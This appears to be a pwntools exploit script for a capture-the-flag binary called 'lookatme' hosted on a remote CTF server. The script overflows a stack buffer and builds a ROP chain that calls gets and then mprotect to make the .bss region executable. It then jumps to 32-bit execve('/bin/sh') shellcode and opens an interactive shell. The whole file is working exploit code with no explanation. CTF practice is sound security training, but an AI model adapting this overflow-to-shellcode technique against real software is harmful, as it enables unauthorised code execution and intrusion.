from pwn import *
from Crypto.Util.number import bytes_to_long


r = remote("ctf.j0n9hyun.xyz", 3017)
# r = process("./lookatme")


# lib = ELF("./libc.so.6")
e = ELF("./lookatme")
'''
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
'''

shellcode32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

pr = 0x08048480
pppr = 0x0806303b
bss = 0x80ea000
gets = 0x804f120
main = 0x080488a3
mprotect = 0x0806e0f0

payload  = b""
payload += b"a" * 0x18
payload += b"a" * 0x4
payload += p32(gets)
payload += p32(pr)
payload += p32(bss + 0x1000)
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(0x10000)
payload += p32(7)
payload += p32(bss + 0x1000)

pause()
r.sendline(payload)
pause()

r.sendline(shellcode32)



r.interactive()
